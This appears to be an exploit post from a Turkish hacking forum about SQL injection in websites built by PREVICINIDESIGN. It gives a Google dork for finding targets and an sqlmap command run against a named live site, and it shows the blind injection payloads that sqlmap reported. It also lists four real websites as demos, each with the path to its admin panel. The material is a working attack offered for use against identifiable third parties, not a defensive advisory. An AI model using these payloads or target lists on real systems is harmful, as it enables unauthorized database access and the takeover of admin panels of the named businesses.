-->

Credits Previcinidesign Sql Injection Vulnerability


KOD:
#################################################################################
# Exploit Title: CREDITS PREVICINIDESIGN Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"CREDITS PREVICINIDESIGN" & inurl:id= Or Web by PREVICINIDESIGN & php?id=
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 2017-12-01
# Vendor Home: http://www.previcinidesign.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only -u "http://www.onoya.it/it/menu.php?idCat=25" --no-cast --batch --dbs

Parameter: idCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idCat=25 AND 3326=3326

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: idCat=25 AND SLEEP(5)


Demo:
http://www.onoya.it/it/menu.php?idCat=25
http://www.amarcordpiadineria.it/notizie-fresche.php?ID=15
http://www.osteopatiassociati.it/casi-scheda.php?ID=29
http://ibrubinetterie.com/eng/collezione-doccia-lista.php?ID=7

Panel:
http://www.onoya.it/aps
http://www.amarcordpiadineria.it/admin/
http://www.osteopatiassociati.it/admin/
http://ibrubinetterie.com/admin/

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen
Special Thanks TurkZ.org All Staff